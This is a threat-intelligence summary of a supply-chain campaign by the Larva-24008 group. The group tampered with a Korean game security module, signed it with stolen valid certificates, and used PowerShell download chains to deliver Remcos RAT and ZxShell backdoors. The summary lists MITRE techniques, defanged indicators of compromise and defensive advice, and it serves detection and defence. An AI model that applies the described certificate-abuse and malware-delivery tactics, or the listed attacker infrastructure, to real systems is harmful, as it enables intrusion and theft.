Supply Chain Attacks on Korean Game Companies Utilizing Valid Certificates

AhnLab ASEC found that the Larva-24008 group performed supply chain attacks by inserting malware into a game security module, signing the tampered module with a valid Korean game company certificate to distribute remote access malware to targeted game companies. The injected code executed PowerShell to fetch obfuscated scripts and conditionally downloaded Remcos RAT and stripped-down ZxShell variants for remote control. #Larva-24008 #Remcos

Keypoints

Threat actor identified as Larva-24008 conducted supply chain compromises against Korean game companies by modifying a game security module.
The malicious module was code-signed with a valid certificate from a Korean game/security company, enabling distribution via official game launchers and installers.
Inserted code executed PowerShell to download and run obfuscated scripts, using conditional checks to target specific IPs before deploying payloads.
Primary payloads observed include Remcos RAT and stripped-down ZxShell backdoors, with ZxShell variants installed as services by a dropper.
Attackers also used signed binaries (including game launchers) to harvest system identifiers and hardware/Windows version info sent to C2 servers.
Stolen certificates have been reused since at least 2017 to sign various tooling (e.g., Mimikatz, PrintSpoofer) and multiple attackers may be leveraging them.
Supply chain distribution and valid certificate usage allowed the malware to bypass defenses and reach targeted corporate systems via official update/install mechanisms.

MITRE Techniques

[T1195] Supply Chain Compromise – The game security module was tampered with to distribute malware through legitimate game installations (‘Attackers compromised a game security module to distribute malware through legitimate game installations.’)
[T1219] Remote Access Tools – Deployed Remcos RAT and ZxShell variants to enable remote control of infected systems (‘The malware installed Remcos RAT to allow remote control of infected systems.’)
[T1086] PowerShell – Executed PowerShell commands to download and run obfuscated scripts from remote addresses (‘The malware executed PowerShell commands to download and run obfuscated scripts from specific addresses.’)
[T1078] Valid Accounts (Code Signing Abuse) – Used valid code-signing certificates from a Korean game/security company to sign malicious modules and launchers, enabling trusted distribution (‘Attackers used valid certificates from a Korean game security company to sign malware, allowing it to bypass security measures.’)

Indicators of Compromise

[MD5] dropper/backdoor hashes – 00eb89ba2b658f90f8749cf7b955b97b, 088d9d15874c1b3d31b1fd620667c38c and 3 more hashes
[URL] download hosts for obfuscated binaries – http[:]//cloud[.]xt[.]to/uploads/09/30/xs[.]bin, http[:]//minecraft[.]cdn[.]fbi[.]to/launcher/cache/new/ipchecker[.]bin
[FQDN] command-and-control / CDN domains – awvsf7esh[.]dellrescue[.]com, cdn[.]anydeskdns[.]com
[IP] C2 / hosting IPs – 104[.]199[.]173[.]2, 185[.]158[.]113[.]101

The technical procedure began with the attacker modifying a legitimate game security module distributed by game companies. The tampered module was signed using a stolen valid certificate, which allowed it to be packaged into official game installers and launchers without tripping code-signing controls. When executed, the injected code runs PowerShell commands that retrieve and decrypt obfuscated script payloads from attacker-controlled URLs; those scripts perform environment checks (including matching specific IP addresses) and, if conditions are met, download and install remote access tools such as Remcos RAT or drop and register stripped-down ZxShell variants as services for persistent remote shell and file management access.

Post-infection activity observed includes service installation by a dropper, execution of remote shell and file-management commands, port forwarding, and use of signed auxiliary tools for privilege escalation and credential harvesting (examples referenced include Mimikatz and PrintSpoofer). Additionally, adversaries signed and distributed seemingly legitimate game launchers that collected system identifiers (username, computer name, MAC, IP) and detailed hardware/Windows version data, which were exfiltrated to C2 servers during launcher execution or updates. The reuse of stolen certificates—traced in cases back to 2017—suggests these signing credentials enable broad abuse across multiple campaigns and actors.

Defensive focus should include verifying build integrity and provenance (implementing SBOMs and stricter code-signing controls), monitoring PowerShell execution and suspicious downloads from the listed URLs/domains, validating installed services against known-good manifests, and blocking or investigating the provided hashes, domains, and IPs within telemetry to detect lateral movement and C2 callbacks.